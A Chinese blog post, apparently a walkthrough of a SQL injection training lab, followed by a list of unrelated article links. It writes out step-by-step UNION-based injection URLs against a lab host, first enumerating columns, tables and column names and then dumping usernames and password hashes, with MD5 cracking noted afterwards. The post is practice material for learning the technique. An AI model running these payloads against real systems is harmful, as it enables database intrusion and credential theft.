当前位置: 首页 > news >正文

sql手工注入漏洞测试(MYSQL)-墨者-url信息

背景:

        自己在墨者官网靶场练习的时候,一直出错,手工容易出错,所以列举一些信息供大家核对,可以参考改动。

数据库版本version()              5.7.22-0ubuntu0.16.04.1
当前数据库名称database()        mozhe_Discuz_StormGroup
当前数据库用户user()             root@localhost
操作系统@@version_compile_os    Linux

信息:

一、猜列

124.70.22.208:45582/new_list.php?id=-1 order by $number

结果:1,2,3,4,只显示2,3

二、inmation_schema查表:

124.70.22.208:45582/new_list.php?id=-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup'

查询结果:StormGroup_member,notice

三、①StormGroup_member表中的列:

124.70.22.208:45582/new_list.php?id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='StormGroup_member'

查询结果:id,name,password,status

四、②notice表中的列:

124.70.22.208:45582/new_list.php?id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='notice'

查询结果:id,title,content,time

分析:显然StormGroup_member表中的列更符合预期,查其中的数据

五、查name,password:

124.70.22.208:45582/new_list.php?id=-1 union select 1,group_concat(name),group_concat(password),4 from StormGroup_member

查询结果,有两个name和对应的password。

总结:

        md5解密后只有一个name可以使用。手工注入较为繁琐,但能锻炼对漏洞的理解,读者们发现问题可私信交流。

相关文章:

  • express+mySql实现用户注册、登录和身份认证
  • WEB渗透—反序列化(九)
  • golang 集成logrus日志框架
  • 基于SpringBoot的旅游网站的设计与实现
  • Could not resolve all files for configuration ‘:app:androidJdkImage‘.
  • Go语言使用AES加密解密
  • 漏洞复现--致远 M3 反序列化 mobile_portal RCE
  • 原生GPT本地及云端部署方式保姆级教程
  • 嵌入式硬件基础知识——1
  • 【LabVIEW学习】3.labview制作安装程序
  • Kafka 如何实现顺序消息
  • 力扣100. 相同的树
  • redis运维(十五) 集合
  • RPA机器人如何确保敏感数据的安全性
  • 深入解析 Python 中 Parsel 的两种数据提取方式
  • 分享的文章《人生如棋》
  • 【EOS】Cleos基础
  • 【干货分享】SpringCloud微服务架构分布式组件如何共享session对象
  • Docker下部署自己的LNMP工作环境
  • HTTP中GET与POST的区别 99%的错误认识
  • JAVA 学习IO流
  • javascript 总结(常用工具类的封装)
  • LintCode 31. partitionArray 数组划分
  • Markdown 语法简单说明
  • niucms就是以城市为分割单位,在上面 小区/乡村/同城论坛+58+团购
  • PHP 使用 Swoole - TaskWorker 实现异步操作 Mysql
  • php面试题 汇集2
  • QQ浏览器x5内核的兼容性问题
  • React-生命周期杂记
  • React系列之 Redux 架构模式
  • Theano - 导数
  • windows下mongoDB的环境配置
  • Zepto.js源码学习之二
  • 从输入URL到页面加载发生了什么
  • 使用iElevator.js模拟segmentfault的文章标题导航
  • 详解NodeJs流之一
  • ​决定德拉瓦州地区版图的关键历史事件
  • # Apache SeaTunnel 究竟是什么?
  • #Lua:Lua调用C++生成的DLL库
  • #vue3 实现前端下载excel文件模板功能
  • #每日一题合集#牛客JZ23-JZ33
  • (11)MSP430F5529 定时器B
  • (175)FPGA门控时钟技术
  • (C语言)输入自定义个数的整数,打印出最大值和最小值
  • (ZT)薛涌:谈贫说富
  • (安全基本功)磁盘MBR,分区表,活动分区,引导扇区。。。详解与区别
  • (附源码)apringboot计算机专业大学生就业指南 毕业设计061355
  • (附源码)ssm高校志愿者服务系统 毕业设计 011648
  • (附源码)计算机毕业设计SSM基于java的云顶博客系统
  • (附源码)计算机毕业设计SSM疫情下的学生出入管理系统
  • (七)理解angular中的module和injector,即依赖注入
  • (转)mysql使用Navicat 导出和导入数据库
  • (转)visual stdio 书签功能介绍
  • .NET 8 中引入新的 IHostedLifecycleService 接口 实现定时任务
  • .NET Core引入性能分析引导优化